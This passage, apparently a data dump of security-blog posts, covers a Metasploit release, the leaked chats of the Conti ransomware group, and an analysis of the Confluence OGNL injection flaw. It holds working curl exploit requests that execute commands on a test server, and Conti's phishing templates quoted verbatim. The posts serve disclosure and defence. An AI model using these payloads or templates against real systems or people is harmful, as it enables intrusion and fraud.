30820122300d06092a864886f70d01010105000382010f003082010a0282010100aa0f09225ff311d136b7c2ed02e5f4c819a924bd59a2ba67ea3e36c837c1d28ba97db085acad9374a543ad0709006d835c80aa273138948ec9ff699142405819e68b8dbc3c04300dc2a93a5be4be2263b69e8282447b6250abad8056de6e7f83b20c6151d72af63c908fa5b0c3ab3a4ac92d8b335a284b0542e3bf9ef10456024df2581b22f233a84e69d41d721aa00e23ba659c4420123d5fdd78ac061ffcb74e5ba60fece415c2be982df57d13afc107b8522dc462d08247e03d63b0d6aa639784e7187384c315147a7d18296f09495ba7969da01b1fb49097295792572a01acdaf7406f2ad5b25d767d8695cc6e33d33dfeeb158a6f50d43d07dd05aa19ff0203010001\n DEBUG:root:[*] AES key: 0x121565e60770fccfc7422960bde14c12193baa605c4fdb5489d9bbd6b659f966\n DEBUG:root:[*] Encrypted AES key: 0x741a972aa2e95260279dc658f4b611ca2039a310ebb834dee47342a5809a68090fed0a87497f617c2b04ecf8aa1d6253cda0a513ccb53b4acc91e89b95b198dce98a0908a4edd668ff51f2fa80f4e2c6bc0b5592248a239f9a7b30b9e53a260b92a3fdf4a07fe4ae6538dfc9fa497d02010ee67bcf29b38ec5a81d62da119947a60c5b35e8b08291825024c734b98c249ad352b116618489246aebd0583831cc40e31e1d8f26c99eb57d637a1984db4dc186f8df752138f798fb2025555802bd6aa0cebe944c1b57b9e01d2d9d81f99a8195222ef2f32de8dfbc150286c122abdc78f19246e5ad65d765c23ba762fe95182587bd738d95814a023d31903c2a46\n DEBUG:root:[*] TLV encryption sorted\n DEBUG:root:[*] sending response packet\n DEBUG:root:[*] running method core_set_session_guid\n DEBUG:root:[*] sending response packet\n DEBUG:root:[*] running method core_enumextcmd\n DEBUG:root:[*] sending response packet\n DEBUG:root:[*] running method core_enumextcmd\n DEBUG:root:[*] sending response packet\n ... etc ...\n \n\nFor full details, see the [Debugging Meterpreter Sessions documentation](<https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html>).\n\n## User-contributable docs\n\nWe have now released user-contributable documentation for Metasploit, available at <https://docs.metasploit.com/>. This new site provides a searchable source of information for multiple topics including:\n\n * [Common Metasploit workflows](<https://docs.metasploit.com/docs/pentesting/>)\n * [Upgrading shells to Meterpreter](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-upgrading-shells-to-meterpreter.html>)\n * [Kubernetes](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-kubernetes.html>)\n * [MySQL](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-mysql.html>)\n * [PostgreSQL](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-postgresql.html>)\n * [SMB](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-smb.html>)\n * [SSH](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-ssh.html>)\n * [WinRM](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-winrm.html>)\n * [Installation guides](<https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html>)\n * [Module development resources](<https://docs.metasploit.com/docs/development/developing-modules/guides/>)\n * ... and more!\n\nContributions are welcome, and the Markdown files can now be found within the Metasploit framework repo, under the [docs folder](<https://github.com/rapid7/metasploit-framework/tree/master/docs>).\n\n## Local exploit suggester improvements\n\nThe `post/multi/recon/local_exploit_suggester` post module can be used to iterate through multiple relevant Metasploit modules and automatically check for local vulnerabilities that may lead to privilege escalation.\n\nNow with Metasploit 6.2, this module has been updated with a number of bug fixes, as well as improved UX that more clearly highlights which modules are viable:\n \n \n msf6 post(multi/recon/local_exploit_suggester) > run session=-1\n ... etc ...\n [*] ::1 - Valid modules for session 3:\n ============================\n # Name Potentially Vulnerable? Check Result\n - ---- ----------------------- ------------\n 1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.\n 2 exploit/linux/local/cve_2022_0847_dirtypipe Yes The target appears to be vulnerable. Linux kernel version found: 5.14.0\n 3 exploit/linux/local/cve_2022_0995_watch_queue Yes The target appears to be vulnerable.\n 4 exploit/linux/local/desktop_privilege_escalation Yes The target is vulnerable.\n 5 exploit/linux/local/network_manager_vpnc_username_priv_esc Yes The service is running, but could not be validated.\n 6 exploit/linux/local/pkexec Yes The service is running, but could not be validated.\n 7 exploit/linux/local/polkit_dbus_auth_bypass Yes The service is running, but could not be validated. Detected polkit framework version 0.105.\n 8 exploit/linux/local/su_login Yes The target appears to be vulnerable.\n 9 exploit/android/local/futex_requeue No The check raised an exception.\n 10 exploit/linux/local/abrt_raceabrt_priv_esc No The target is not exploitable.\n 11 exploit/linux/local/abrt_sosreport_priv_esc No The target is not exploitable.\n 12 exploit/linux/local/af_packet_chocobo_root_priv_esc No The target is not exploitable. Linux kernel 5.14.0-kali4-amd64 #1 is not vulnerable\n 13 exploit/linux/local/af_packet_packet_set_ring_priv_esc No The target is not exploitable.\n 14 exploit/linux/local/apport_abrt_chroot_priv_esc No The target is not exploitable.\n 15 exploit/linux/local/asan_suid_executable_priv_esc No The check raised an exception.\n 16 exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc No The target is not exploitable.\n \n\nSetting the option `verbose=true` will now also highlight modules that weren\u2019t considered as part of the module suggestion phase due to session platform/arch/type mismatches. This is useful for evaluating modules that may require manually migrating from a shell session to Meterpreter, or from a Python Meterpreter to a native Meterpreter to gain local privilege escalation.\n\n## Upcoming roadmap work\n\nIn addition to the normal module development release cycle, the Metasploit team has now begun work on adding Kerberos authentication support as part of a planned Metasploit 6.3.0 release.\n\n## Get it\n\nExisting Metasploit Framework users can update to the latest release of Metasploit Framework via the `msfupdate` command.\n\nNew users can either download the latest release through our [nightly installers](<https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html>), or if you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest release.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-09T16:39:00", "type": "rapid7blog", "title": "Announcing Metasploit 6.2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-0847", "CVE-2022-1388", "CVE-2022-21999", "CVE-2022-22954", "CVE-2022-30525"], "modified": "2022-06-09T16:39:00", "id": "RAPID7BLOG:02EDDA927928C11A6D10A4A0D17823AF", "href": "https://blog.rapid7.com/2022/06/09/announcing-metasploit-6-2/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-09T17:28:27", "description": "\n\n**_UPDATE: _**_As of March 2, 2022, Conti began taking down exposed infrastructure as a result of the chat disclosure. At that time, we assessed that due to their sophisticated capability, deep funding, and quick recovery from exposed infrastructure in November 2021, they remained an active and significant threat. As of March 9, 2022, our threat intelligence team has observed a resumption of normal operations from Conti._\n\nOn February 27, Twitter user [@ContiLeaks](<https://twitter.com/contileaks>) released a trove of chat logs from the ransomware group, Conti \u2013 a sophisticated ransomware group whose manual was publicly [leaked last year](<https://blog.talosintelligence.com/2021/09/Conti-leak-translation.html>). Ahead of the chat log disclosures, Conti pledged their support for the Russian Government following the Russian invasion of Ukraine. However, a number of members sided with Ukraine, causing strife within the organization. Two days later, Conti posted a second message revising their statement to condemn the war and to strike back only if Russian critical infrastructure is targeted.\n\n_Conti announcement of support for Russian government_\n\n_Conti walk-back of their support for Russia_\n\n_@ContiLeaks announcement of the release_\n\nAt the time of the leak, a file titled `1.tgz` was released on the \u201cAnonFiles\u201d website, containing 14 megabytes of chat logs across 393 JSON files. However, some of the messages were encrypted and could not be read, so the information provided is necessarily incomplete. The remaining files contained internal Conti communications, screenshots of tools, and discussions of their exploits and design processes. \n\nOn February 28 and March 1, a bevy of additional files were posted, along with a number of pro-Ukraine tweets. Among both sets of leaked messages, there were a number of usernames and passwords for a variety of accounts. Additionally, user @ContiLeaks shared access details for a number of alleged Conti command and control servers, plus storage servers for stolen files. However, we have not accessed any of the data necessitating access to remote servers or the use of usernames and passwords, and we strongly recommend against doing so. \n\n@ContiLeaks also shared a file that they purport to be the source code for the Conti ransomware but declined to share the password except with \u201ctrusted parties.\u201d @ContiLeaks did, however, name one alleged Conti developer, providing their email address and Github. The scale of the leaked information suggests that the leaker is likely either a very senior member of the group or a coalition of disgruntled Conti affiliates.\n\n## Conti is a business \u2013 and a well-funded one\n\nMuch of the discussion within the chat logs concerns fairly mundane things \u2013 interviewing potential operators of the group, payment for services, out-of-office messages, gossip, and discussions of products. Based on the leaked chats, the Conti interview process actually looks a lot like a standard technical interview, with coding exercises to be performed hosted on public code repositories, salary negotiations, and the status of ongoing products. \n\nIn addition to other financial information related to specific actors, the leaked chats have revealed Conti\u2019s primary Bitcoin address, which contains over **two billion USD** as of February 28, 2022. Moreover, a conversation on April 9, 2021 between \u201cmango\u201d and \u201cjohnyboy77\u201d indicates Russian FSB involvement in some portion of their funding and that the FSB were interested in files from the media outlet Bellingcat on \u201cNavalny\u201d \u2013 an apparent reference to Alexei Navalny, the currently imprisoned opposition leader in Russia.\n\n## Conti development\n\nConti seems to operate much like a software company \u2013 the chat logs disclose concerns with the development of specific features for targets and a particular difficulty in encrypting very large files. The Conti team also attempted to get demos of popular endpoint detection software with the intent to develop their malware to avoid detection.\n\nTwo of the actors, \u201clemur\u201d and \u201cterry\u201d shared phishing templates (included verbatim in Appendix B at the end of this post) to be used against potential targets. Conti gains initial access in many ways, with phishing a popular line of attack due in part to its relatively high efficacy and low cost. Conti often uses phishing emails to establish a presence on targeted networks.\n\nA screenshot of the Conti control panel was also leaked, showing a number of compromised hosts and a breakdown of the operating systems, antiviruses, user rights, and detailed information about the infected assets.\n\n_Conti control panel_\n\nFurther discussions detailed the use of infrastructure against targets, disclosing a number of both known and unknown Conti command and control domains. At the time of this post, only a small number of the previously unknown command and control domains appear to be active. Conversations between two operators, \u201cStern\u201d and \u201cBentley\u201d discuss the use of third parties for malicious documents, favoring certain providers over others. They also discuss logistics for how to deliver ransomware without being detected by dynamic analysis. In a conversation between the two back in June of 2021, Stern discloses that Conti wants to start their own cryptocurrency but does not know who to work with. There is no evidence that anything came of this desire, and Conti continues to use Bitcoin for their ransoms. \n\n## Other groups assert they are strictly business\n\nIn stark contrast to Conti, other groups have made it clear to the public that despite their \u201cbusiness model,\u201d they take no public stance on this crisis. LockBit is remaining aloof from the conflict and made it clear that they intend to operate as usual. Although it is believed that LockBit is a Russian organization, they assert that \u201cwe are all simple and peaceful people, we are all Earthlings,\u201d and \u201cfor us it is just business and we are all apolitical.\u201d Another ransomware group, ALPHV, claims to be \u201cextremely saddened\u201d by Conti\u2019s pledge of support and condemns Conti. Their message concludes, \u201cThe Internet, and even more so its dark side, is not the place for politics.\u201d\n\n## Rumors of Conti\u2019s demise have been greatly exaggerated\n\nConti\u2019s payment and \u201csupport\u201d portal is still live, even following the infighting and leaks. Conti has repeatedly proven to be one of the most capable ransomware actors and these chats indicate that the group is well-organized and still very well-funded despite the schism. Any suggestion that these leaks spell the end for Conti is overstated, and we expect that Conti will continue to be a powerful player in the ransomware space.\n\n## What you can do\n\nWe are keeping an eye on dark web activity related to Conti and other ransomware groups and want to reiterate the following steps for protecting yourself from ransomware: \n\n\n * User education, especially related to well-crafted phishing campaigns\n * Asset and vulnerability management, including reducing your external attack surface\n * Multi-factor authentication \n\n\nAdditionally, it is worth ensuring that you are well-guarded against the exploits and malware commonly used by Conti (vulnerabilities provided in Appendix A at the end of this post). Furthermore, security teams should also take some time to review [CISA\u2019s recent report on the group](<https://www.cisa.gov/uscert/ncas/alerts/aa21-265a>). For further discussion on how to protect yourself from ransomware, see our [ransomware playbook](<https://www.rapid7.com/solutions/ransomware/>). \n\n\n## Appendix A \u2013 Conti known exploited vulnerabilities\n\nCVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146 (MS17-010; EternalBlue/EternalSynergy/EternalChampion)\n\nCVE-2020-1472 (ZeroLogon)\n\nCVE-2021-34527 (PrintNightmare)\n\nCVE-2021-44228 (Log4Shell)\n\nCVE-2021-34473, CVE-2021-34523, CVE-2021-31207 (ProxyShell/ProxyLogon)\n\n## Appendix B \u2013 Phishing templates\n\n{Greetings|Hello|Good afternoon|Hi|Good day|Greeting|Good morning|Good evening}! \n{Here|Right here|In this letter|With this letter} we {send|direct} you {all the|all the necessary|the most important} {documentation|papers|documents|records} {regarding|concerning|relating to} your {payment|deposit payment|last payment} {#|\u2116|No. }\u041d\u041e\u041c\u0415\u0420 \u041f\u041b\u0410\u0422\u0415\u0416\u0410, right {as we|as we have} {discussed|revealed} {not so long ago|not too long ago|recently|just recently|not long ago}. Please {review the|check the|take a look at} \u0430ll {necessary|required|important} {information|data} in the {file attached|attached file}. \n\u0422: {Payment|Deposit payment} {invoice|receipt} {#|\u2116|No. }\u041d\u041e\u041c\u0415\u0420 \u0418\u041d\u0412\u041e\u0419\u0421\u0410 {prepared|formed} \nD: {payment|deposit|dep|paym}_{info|information|data}\n\n{Hello|Greetings|Greetings to you|Good evening|Good morning|Good day|Good afternoon}{!|,|.|} \nYour {order|purchase order|online order} was {successfully|correctly|timely} {paid|compensated|covered} by you {yesterday|today|recently}. Your {documentation|docs|papers} and {bank check|receipt|paycheck} {can be found|are listed} in the {attached file|file attached}. \nT: {Invoice|Given invoice|Bill} {we|we have|we\u2019ve} {sent|mailed|delivered} to you {is paid|is covered|is processed}. \nD: {Purchase order|Order} {verification|approval}\n\n{Hello|Greetings|Greetings to you|Good evening|Good morning|Good day|Good afternoon}{!|,|.|} \n{We are contacting you to|This is to|This mail is to} {notify|remind} you {about|regarding} your {debt|unprocessed payment} for {our last|the recent|our recent} {contract|agreement}. All {compensation|payment} {data|information}, {agreement|contract} and prepared legal {documents|documentation} {can be found|are located} in the {file attached|attached file}. \nT: {Missing|Additional} payment {information|details|info} reminder \nD: {Contract|Agreement} 2815/2 {case|claim}\n\n{Hello|Greetings|Greetings to you|Good evening|Good morning|Good day|Good afternoon}{!|,|.|} \n{Your payment|Your advance payment|Your obligatory payment|Payment you sent|Payment you made} was {successfully|correctly|timely|properly} {achieved|accomplished|approved|affirmed|received|obtained|collected|processed}. All {required documentation|necessary documents|important documentation|documents you need|details that can be important|essential documents} {can be found|you can find} in the {attached file|file attached}. \nT: {Invoicing|Invoice|Agreement|Contract|Payment} {info|data|information|details} \nD: {Receipt|Bill} {id|ID|Number|number|No.|No.|No|#|##} 3212-inv8\n\n{Greetings|Hello|Good day|Good afternoon}{!|,|} \n{Thank you for|We are thankful for|We are grateful for|Many thanks for} {your|your recent} {on-line order|purchase order|order}. {We|Our financiers have|Our team has|We have|Our shop has} {received|collected|processed|checked} your {payment|advance payment|money transfer|funds transfer} \u041d\u041e\u041c\u0415\u0420 \u041f\u0415\u0420\u0415\u0412\u041e\u0414\u0410. Now we {are and ready to|begin to} {pack|prepare|compose} your {shipment|order|box}. Your {parcel|packet|shipment|box} {will|is going to|would} {arrive|be delivered} to {you|your residence} within {4|5|6|four|five|six} {days|business days}. \n{Total|Full|Whole} {order|purchase|payment} sum: \u0421\u0423\u041c\u041c\u0410 \nYou {can find|will find} {all|full} {relative information|order info|order and payment details} and your {receipt|check} \u041d\u041e\u041c\u0415\u0420 \u0427\u0415\u041a\u0410 {in|in the} {attached file|file attached}. \n{Thank you!|Have a nice day!} \n\u0422\u0415\u041c\u042b: Your {order|purchase|on-line order|last order} \u041d\u041e\u041c\u0415\u0420 \u0417\u0410\u041a\u0410\u0417\u0410 payment {processed|obtained|received} \n\u0410\u0422\u0422\u0410\u0427\u0418: \nord_conf \nfull.details \ncompl_ord_7847 \nbuyer_auth_doc \ninfo_summr \ncustomer_docs \nspec-ed_info\n\n \n_**Additional reading**_\n\n * _[Russia/Ukraine Conflict: What Is Rapid7 Doing to Protect My Organization?](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-conflict-what-is-rapid7-doing-to-protect-my-organization/>)_\n * _[Staying Secure in a Global Cyber Conflict](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-staying-secure-in-a-global-cyber-conflict/>)_\n * _[Prudent Cybersecurity Preparation for the Potential Russia-Ukraine Conflict](<https://www.rapid7.com/blog/post/2022/02/15/prudent-cybersecurity-preparation-for-the-potential-russia-ukraine-conflict/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-03-01T19:15:58", "type": "rapid7blog", "title": "Conti Ransomware Group Internal Chats Leaked Over Russia-Ukraine Conflict", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2020-1472", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-44228"], "modified": "2022-03-01T19:15:58", "id": "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "href": "https://blog.rapid7.com/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-07T01:56:25", "description": "\n\nOn June 2, 2022, Atlassian published a [security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for CVE-2022-26134, a critical unauthenticated remote code execution vulnerability in Confluence Server and Confluence Data Center. The vulnerability was unpatched when it was published on June 2. As of June 3, both patches and a temporary workaround are available.\n\nCVE-2022-26134 is being actively and widely [exploited in the wild](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>). Rapid7's Managed Detection and Response (MDR) team has observed an uptick of likely exploitation of CVE-2022-26134 in customer environments as of June 3.\n\nAll supported versions of Confluence Server and Data Center are affected. \nAtlassian updated their advisory on June 3 to reflect that it's likely that **all versions** (whether supported or not) of Confluence Server and Data Center are affected, but they have yet to confirm the earliest affected version. Organizations should install patches OR apply the workaround on an **emergency basis**. If you are unable to mitigate the vulnerability for any version of Confluence, you should restrict or disable Confluence Server and Confluence Data Center instances immediately.\n\n## Technical analysis\n\nCVE-2022-26314 is an unauthenticated and remote OGNL injection vulnerability resulting in code execution in the context of the Confluence server (typically the `confluence` user on Linux installations). Given the nature of the vulnerability, [internet-facing](<https://www.shodan.io/search?query=X-Confluence-Request-Time>) Confluence servers are at very high risk.\n\nLast year, Atlassian Confluence suffered from a different unauthenticated and remote OGNL injection, [CVE-2021-26084](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>). Organizations maintaining an internet-facing Confluence or Data Server may want to consider permanently moving access behind a VPN.\n\n### The vulnerability\n\nAs stated, the vulnerability is an OGNL injection vulnerability affecting the HTTP server. The OGNL payload is placed in the URI of an HTTP request. Any type of HTTP method appears to work, whether valid (GET, POST, PUT, etc) or invalid (e.g. \u201cBALH\u201d). In its simplest form, an exploit abusing the vulnerability looks like this:\n \n \n curl -v http://10.0.0.28:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/\n \n\nAbove, the exploit is URL-encoded. The exploit encompasses everything from the start of the content location to the last instance of `/`. Decoded it looks like this:\n \n \n ${@java.lang.Runtime@getRuntime().exec(\"touch /tmp/r7\")}\n \n\nEvidence of exploitation can typically be found in access logs because the exploit is stored in the HTTP request field. For example, on our test Confluence (version 7.13.6 LTS), the log file `/opt/atlassian/confluence/logs/conf_access_log.<yyyy-mm-dd>.log` contains the following entry after exploitation:\n \n \n [02/Jun/2022:16:02:13 -0700] - http-nio-8090-exec-10 10.0.0.28 GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/ HTTP/1.1 302 20ms - - curl/7.68.0\n \n\nScanning for vulnerable servers is easy because exploitation allows attackers to force the server to send command output in the HTTP response. For example, the following request will return the response of `whoami` in the attacker-created `X-Cmd-Response` HTTP field (credit to Rapid7\u2019s Brandon Turner for the exploit below). Note the `X-Cmd-Response: confluence` line in the HTTP response:\n \n \n curl -v http://10.0.0.28:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/\n * Trying 10.0.0.28:8090...\n * TCP_NODELAY set\n * Connected to 10.0.0.28 (10.0.0.28) port 8090 (#0)\n > GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1\n > Host: 10.0.0.28:8090\n > User-Agent: curl/7.68.0\n > Accept: */*\n > \n * Mark bundle as not supporting multiuse\n < HTTP/1.1 302 \n < Cache-Control: no-store\n < Expires: Thu, 01 Jan 1970 00:00:00 GMT\n < X-Confluence-Request-Time: 1654212503090\n < Set-Cookie: JSESSIONID=34154443DC363351DD0FE3D1EC3BEE01; Path=/; HttpOnly\n < X-XSS-Protection: 1; mode=block\n < X-Content-Type-Options: nosniff\n < X-Frame-Options: SAMEORIGIN\n < Content-Security-Policy: frame-ancestors 'self'\n < X-Cmd-Response: confluence \n < Location: /login.action?os_destination=%2F%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D%2Findex.action&permissionViolation=true\n < Content-Type: text/html;charset=UTF-8\n < Content-Length: 0\n < Date: Thu, 02 Jun 2022 23:28:23 GMT\n < \n * Connection #0 to host 10.0.0.28 left intact\n \n\nDecoding the exploit in the `curl` request shows how this is achieved. The exploit saves the output of the `exec` call and uses `setHeader` to include the result in the server\u2019s response to the attacker.\n \n \n ${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(\"whoami\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Cmd-Response\",#a))}\n \n\n### Root cause\n\nOur investigation led to the following partial call stack. The call stack demonstrates the OGNL injection starting from `HttpServlet.service` to `OgnlValueStack.findValue` and beyond.\n \n \n at ognl.SimpleNode.evaluateGetValueBody(SimpleNode.java:171)\n at ognl.SimpleNode.getValue(SimpleNode.java:193)\n at ognl.Ognl.getValue(Ognl.java:333)\n at ognl.Ognl.getValue(Ognl.java:310)A\n at com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)\n at com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)\n at com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)\n at com.opensymphony.xwork.DefaultActionInvocation.executeResult(DefaultActionInvocation.java:263)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:187)\n at com.atlassian.confluence.xwork.FlashScopeInterceptor.intercept(FlashScopeInterceptor.java:21)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.actions.LastModifiedInterceptor.intercept(LastModifiedInterceptor.java:27)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.ConfluenceAutowireInterceptor.intercept(ConfluenceAutowireInterceptor.java:44)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeAndHandleExceptions(TransactionalInvocation.java:61)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeInTransaction(TransactionalInvocation.java:51)\n at com.atlassian.xwork.interceptors.XWorkTransactionInterceptor.intercept(XWorkTransactionInterceptor.java:50)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.xwork.SetupIncompleteInterceptor.intercept(SetupIncompleteInterceptor.java:61)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.security.interceptors.SecurityHeadersInterceptor.intercept(SecurityHeadersInterceptor.java:26)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.DefaultActionProxy.execute(DefaultActionProxy.java:115)\n at com.atlassian.confluence.servlet.ConfluenceServletDispatcher.serviceAction(ConfluenceServletDispatcher.java:56)\n at com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)\n at javax.servlet.http.HttpServlet.service(HttpServlet.java:764)\n \n\n`OgnlValueStack` [findValue(str)](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ognl/OgnlValueStack.html#findValue-java.lang.String->) is important as it is the starting point for the OGNL expression to be evaluated. As we can see in the call stack above, `TextParseUtil.class` invokes `OgnlValueStack.findValue` when this vulnerability is exploited.\n \n \n public class TextParseUtil {\n public static String translateVariables(String expression, OgnlValueStack stack) {\n StringBuilder sb = new StringBuilder();\n Pattern p = Pattern.compile(\"\\\\$\\\\{([^}]*)\\\\}\");\n Matcher m = p.matcher(expression);\n int previous = 0;\n while (m.find()) {\n String str1, g = m.group(1);\n int start = m.start();\n try {\n Object o = stack.findValue(g);\n str1 = (o == null) ? \"\" : o.toString();\n } catch (Exception ignored) {\n str1 = \"\";\n } \n sb.append(expression.substring(previous, start)).append(str1);\n previous = m.end();\n } \n if (previous < expression.length())\n sb.append(expression.substring(previous)); \n return sb.toString();\n }\n }\n \n\n`ActionChainResult.class` calls `TextParseUtil.translateVariables` using `this.namespace` as the provided expression:\n \n \n public void execute(ActionInvocation invocation) throws Exception {\n if (this.namespace == null)\n this.namespace = invocation.getProxy().getNamespace(); \n OgnlValueStack stack = ActionContext.getContext().getValueStack();\n String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);\n String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);\n \n\nWhere `namespace` is created from the request URI string in `com.opensymphony.webwork.dispatcher.ServletDispatcher.getNamespaceFromServletPath`:\n \n \n public static String getNamespaceFromServletPath(String servletPath) {\n servletPath = servletPath.substring(0, servletPath.lastIndexOf(\"/\"));\n return servletPath;\n }\n \n\nThe result is that the attacker-provided URI will be translated into a namespace, which will then find its way down to OGNL expression evaluation. At a high level, this is very similar to [CVE-2018-11776](<https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts2_namespace_ognl.rb>), the Apache Struts2 namespace OGNL injection vulnerability. Just a reminder that there is nothing new in this world.\n\n### The patch\n\nOn June 3, 2022, Atlassian directed customers to replace `xwork-1.0.3.6.jar` with a newly released `xwork-1.0.3-atlassian-10.jar`. The xwork jars contain the `ActionChainResult.class` and `TextParseUtil.class` we identified as the path to OGNL expression 